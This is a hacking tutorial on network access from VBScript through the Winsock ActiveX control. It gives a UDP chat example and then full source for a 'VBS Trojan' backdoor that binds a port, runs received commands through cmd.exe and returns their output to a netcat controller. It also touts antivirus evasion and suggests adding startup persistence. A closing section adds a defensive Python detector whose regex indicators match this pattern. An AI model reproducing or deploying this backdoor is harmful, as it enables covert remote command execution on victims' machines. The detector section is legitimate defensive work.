About a year ago, VBS script viruses caused a flurry of excitement, and a large group of VBS viruses flourished on the internet. At that time, almost all VBS viruses used FSO and MAPI as their infection engine, so I wondered: can VBS access the network? If it could also connect to ports, that would be amazing. From then on, I tried to find information about networking in VBS. Unfortunately, for a long time I found nothing; only a month ago, once the college entrance examination was over, could I settle down to work on this, and I finally made a little progress.
Now let's analyze how VBS works. The full name of VBS is "Visual Basic Scripts". Because VBS is an object-oriented scripting language derived from Visual Basic, its syntax is similar to that of Visual Basic, and it also relies on objects to implement its more advanced functions. The difference is that VBS is interpreted by Wscript.exe or Cscript.exe, so it does not need to be compiled and can be run directly. This is also one of the special features of VBS scripts as hacking tools: ordinary anti-virus software will not be interested in VBS. Because VBS is an object-oriented scripting language, many of Microsoft's ActiveX components can be referenced by creating them with CreateObject("objectname"), and these may be Microsoft's programming interfaces! Friends who have written network programs in VB probably know that there are roughly two ways to do so: one is to call Windows API functions, the other is to use VB's Winsock control, which you can see in the Windows system directory as "Mswinsock.ocx". Since the API functions are more complex, many friends prefer the Winsock control that comes with VB. I do not know whether you have noticed, but the Winsock control is in fact one of the ActiveX components I mentioned earlier. It provides a convenient way to access TCP and UDP network services: to write a client or server application, you do not have to know the details of TCP or call low-level Winsock APIs. By setting the control's properties and calling its methods, you can easily connect to a remote machine and exchange data in both directions. Now that we have found the engine for accessing the network, how do we use it? Is its usage the same as in VB?
The Winsock control is used in much the same way as in VB, but in VBS an ActiveX control is not visible as it is in VB, and of course the object must be created before it can be referenced in VBS. It is created in the same way as FSO and similar objects. Create a new text file and write in it:
--------------------------------------------------
Set sock = CreateObject("MSWinsock.Winsock")
sock.AboutBox
--------------------------------------------------
Save it as *.vbs and run it; you will see information about the Winsock control registered on your system.
How about that? Happy? Don't worry, I'll go into detail below. Now that the object has been created successfully, we can of course use it as in VB. A Winsock object created in VBS cannot have its parameters set through a graphical interface as in VB, so the first step is to set which protocol you are creating. The protocol is set through the "Protocol" property of the Winsock control, for example sock.Protocol=0 or sock.Protocol=1. Note that when the value of "Protocol" is "0" the protocol being created is TCP, and when the value is "1" it is UDP.
Let me introduce the basic methods and events of the Winsock control:
LocalHostName // Get the local host name
LocalIP // Get the local host IP
SocketHandle // Get the handle of the created socket
RemotePort // Set or get the remote port
LocalPort // Set or get the local port
State // Returns the current state of the created socket (values below) {
0 Closed (the default)
1 Open
2 Listening
3 Connection pending
4 Resolving host
5 Host resolved
6 Connecting
7 Connected
8 Peer is closing the connection
9 Error }
BytesReceived // Returns the amount of data received (currently in the receive buffer)
Connect (remotehost, remoteport) // Establish a remote connection; remotehost is the remote host IP, remoteport is the remote host port
Listen // Put the socket into the listening state
SendData / GetData // Send or receive data
Close // Close the object
Bind (LocalPort, LocalIP) // Bind to a port
That covers the basics. Next I test sending a message to a remote host (UDP). The following is a VBS file you can try; the code is as follows (file sock-udp.vbs):
----------------------------------------
Dim revdata
Dim sendata
' Create a Winsock object
Set sock = CreateObject("MSWinsock.Winsock")
' Use the UDP protocol
sock.Protocol = 1
' Establish a connection
sock.Connect "127.0.0.1", 1234
' Define the data to send
sendata = "Hello!!!" & Chr(13)
' Send the data we want to send
sock.SendData sendata
Do
    ' If there is a data response, show it
    If sock.BytesReceived > 0 Then
        ' Specify the type of the data to receive (the types are vbByte, vbInteger, vbLong, vbSingle,
        ' vbDouble, vbCurrency, vbDate, vbBoolean, vbError, vbString, vbArray + vbByte).
        ' Data is only received correctly when the type is specified; otherwise you get garbage.
        sock.GetData revdata, vbString
        sendata = InputBox(revdata, "Recvieddata", "Please enter the message you want to send")
        sock.SendData sendata & Chr(13)
        ' End the VBS process when a string containing "exit" is received
        If InStr(revdata, "exit") Then Exit Do
    Else
    End If
Loop
' Close the socket object
sock.Close
------------------------------------------
Then use "nc -u -l -p 1234" to listen on local UDP port 1234, and then run the VBS file just written. Look! My NC is responding.
The "MicroSoft (r) Windows Based Script Host" in it is our VBS host process. We can also send messages from NC and chat. How about that? A simple UDP client/server has been completed. Now let me write something more about its uses: since it can access the network, of course it can be used to make a VBS Trojan! The veterans will not object, will they? Haha, let's go!
--------------------------
Dim revdata
Set sock = CreateObject("MSWinsock.Winsock")
Set sc = CreateObject("WScript.Shell")
Set fso = CreateObject("Scripting.FileSystemObject")
sock.Protocol = 1 ' This of course selects the UDP protocol
sock.Bind 1234 ' Bind a local UDP port
Do
    If sock.BytesReceived > 0 Then
        sock.GetData revdata, vbString
        If InStr(revdata, "exit") > 0 Then
            Exit Do
        Else
            On Error Resume Next
            tempfile = "C:\" & fso.GetTempName
            ' cmd = Right(revdata, Len(revdata) - 4)
            cmd = Left(revdata, Len(revdata) - 3)
            ' Redirect the output of cmd to a file
            Call sc.Run("cmd.exe /c " & cmd & " > " & tempfile, 0, True)
            Set txf = fso.OpenTextFile(tempfile, 1, False, 0)
            ' Read the output file into memory and send it to the client with SendData
            sock.SendData txf.ReadAll & vbCrLf & vbCrLf
            txf.Close
            Call fso.DeleteFile(tempfile, True)
        End If
        ' Hee hee, here is my copyright notice
        sock.SendData "--end--" & vbCrLf & "Forhelp exit:end|run:<runfilename>" & vbCrLf & "Maked by Attrib data:2004.7.28 " & vbCrLf & vbCrLf
    End If
Loop
sock.SendData "Connection closed!" & vbCrLf
sock.Close
Set sock = Nothing
-------------------
At this point, the basic structure of the code is complete; to make an all-purpose Trojan you can add more code, such as running automatically at startup. Because the VBS program does not set up error protection, some errors may occur; interested friends can try it for themselves. To use it, first run this VBS backdoor on the server side, then connect with your NC. Because it uses the UDP protocol, the NC command line is "nc -u IP Port" (remember to add the "-u" parameter). After that it is used in the same way as WinShell. Below are screenshots of the test on my machine.
As for how to write the TCP version, the principle is similar to UDP, so I will not write more here; you can study it on your own.
If you have a better method, please share it with me. Thank you for reading.
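From the defender's side, the second script above has a recognisable static shape: it creates the Winsock control and WScript.Shell in the same file and passes received data to cmd.exe. The triage check below is an added example, not code from the original article; the indicator names, verdict strings and sample snippets are constructed for illustration.

```python
import re

# Indicators from this page's two scripts; VBScript is case-insensitive, so match lowercased text.
INDICATORS = {
    "winsock_control": r'createobject\("mswinsock\.winsock',
    "shell_object": r'createobject\("wscript\.shell"\)',
    "socket_bind": r'\.(bind|listen)\b',
    "socket_read": r'\.getdata\b',
    "cmd_launch": r'\.run\(?\s*"(%comspec%|cmd\b)',
}

def strip_comment(line):
    """Cut a VBScript ' comment, ignoring apostrophes inside string literals."""
    in_string = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_string = not in_string
        elif ch == "'" and not in_string:
            return line[:i]
    return line

def normalize(source):
    """Lowercase, drop comments, tighten spacing, join "a" & "b" literals."""
    text = " ".join(strip_comment(l) for l in source.splitlines()).lower()
    text = re.sub(r'\s*([&(.])\s*', r'\1', text)
    return text.replace('"&"', '')

def triage(source):
    """Return (verdict, matched indicator names) for one script's source."""
    text = normalize(source)
    hits = sorted(n for n, rx in INDICATORS.items() if re.search(rx, text))
    if {"winsock_control", "shell_object", "cmd_launch"} <= set(hits):
        return "remote-shell pattern", hits
    if "winsock_control" in hits:
        return "network-capable script", hits
    return "no winsock use", hits

# Constructed samples (not real captures), reduced to the calls that matter.
SAMPLE_SHELL = '''Set sock = CreateObject ("MSWin" & "sock.Winsock")
Set sc = CreateObject("WScript.Shell")
sock.Bind 1234
sock.GetData revdata, vbString
Call sc.Run("cmd.exe /c " & cmd & " > " & tempfile, 0, True)'''
SAMPLE_CHAT = '''Set sock = CreateObject("MSWinsock.Winsock") ' CreateObject("WScript.Shell") not used
sock.Connect "127.0.0.1", 1234
sock.SendData "Hello!!!" & Chr(13)'''

if __name__ == "__main__":
    print(triage(SAMPLE_SHELL), triage(SAMPLE_CHAT))
```

A script that only talks over the socket, like sock-udp.vbs, is reported as network-capable rather than as a shell, which keeps the alert specific to the command-execution combination.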